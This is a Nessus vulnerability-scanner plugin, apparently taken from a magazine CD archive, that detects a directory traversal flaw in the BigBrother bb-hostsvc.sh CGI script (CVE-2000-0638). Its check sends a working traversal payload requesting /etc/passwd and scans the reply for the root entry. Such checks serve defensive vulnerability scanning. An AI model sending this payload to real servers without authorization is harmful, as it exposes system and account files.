home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / bb-hostsvc.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  71 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10460);
  10.  script_bugtraq_id(1455);
  11.  script_version ("$Revision: 1.18 $");
  12.  script_cve_id("CVE-2000-0638");
  13.  script_name(english:"bb-hostsvc.sh");
  14.  
  15.  script_description(
  16.      english:"It is possible to view arbitrary files on a system where versions 
  17. 1.4h or older of 'BigBrother' are installed, using a flaw in the bb-hostsvc.sh CGI
  18. program.
  19.  
  20. Solution : Upgrade to version 1.4i or later.
  21.  
  22. Risk factor : High",
  23.  
  24.     francais:"Il est possible de lire des fichiers arbitraires sur
  25. un systΦme sur lequel la version 1.4h ou plus ancienne de  'BigBrother' sont
  26. installΘes, en utilisant un problΦme dans le programme cgi 'bb-hostsvc.sh'.
  27.  
  28. Solution: Upgradez α la version 1.4i ou plus rΘcente.
  29.  
  30. Facteur de risque : ElevΘ");
  31.  
  32.  script_summary(english:"Read arbitrary files using the CGI bb-hostsvc.sh",
  33.          francais:"Lit des fichiers arbitraires en utilisant le CGI bb-hostsvc.sh");
  34.  
  35.  script_family(english:"CGI abuses", francais:"Abus de CGI");
  36.   
  37.  script_category(ACT_GATHER_INFO);
  38.  script_dependencie("find_service.nes", "http_version.nasl");
  39.  script_require_ports("Services/www", 80);
  40.  script_copyright("Copyright (C) 1999 Renaud Deraison"); 
  41.  exit(0);
  42. }
  43.  
  44. #
  45. # The script code starts here
  46. #
  47.  
  48. include("http_func.inc");
  49. include("http_keepalive.inc");
  50.  
  51.  
  52. port = get_http_port(default:80);
  53.  
  54. if(!get_port_state(port))exit(0);
  55.  
  56. foreach dir (cgi_dirs())
  57. {
  58.  command = string(dir, "/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd");
  59.  req = http_get(item:command, port:port);
  60.  flaw = 0;
  61.  buffer = http_keepalive_send_recv(port:port, data:req);
  62.  if( buffer == NULL ) exit(0);
  63.  if(egrep(pattern:"root:.*:0:[01]", string:buffer))
  64.  {  
  65.   security_hole(port);
  66.   exit(0);
  67.  }
  68. }
  69.  
  70.